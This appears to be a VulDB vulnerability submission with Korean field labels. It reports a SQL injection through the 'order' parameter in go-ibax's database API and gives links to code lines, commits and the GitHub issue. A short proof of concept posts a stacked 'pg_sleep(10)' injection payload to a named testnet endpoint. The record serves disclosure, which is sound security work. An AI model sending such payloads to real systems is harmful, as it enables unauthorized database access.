| 제목 | SQL injection vulnerability in go-ibax via order parameter |
|---|
| 설명 | SQL Injection vulnerability in /packages/api/database.go of go-ibax via order parameter . This issue affects versions starting from commits on Jul 18, 2020.
file:
https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L187
https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L189
commits:
https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172
https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174
POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
① order=1%3b+select+pg_sleep(10)--&table_name=pg_user&limit=1&page=1
② with where parameter :
order=1%3b+select+pg_sleep(10)--&table_name=pg_user&where=1=1&limit=1&page=1 |
|---|
| 원천 | ⚠️ https://github.com/IBAX-io/go-ibax/issues/2062 |
|---|
| 사용자 | Tomy (UID 34751) |
|---|
| 제출 | 2022. 11. 01. PM 12:40 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 11. 01. PM 04:43 (4 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 212637 [IBAX go-ibax /api/v2/open/rowsInfo order SQL 주입] |
|---|
| 포인트들 | 20 |
|---|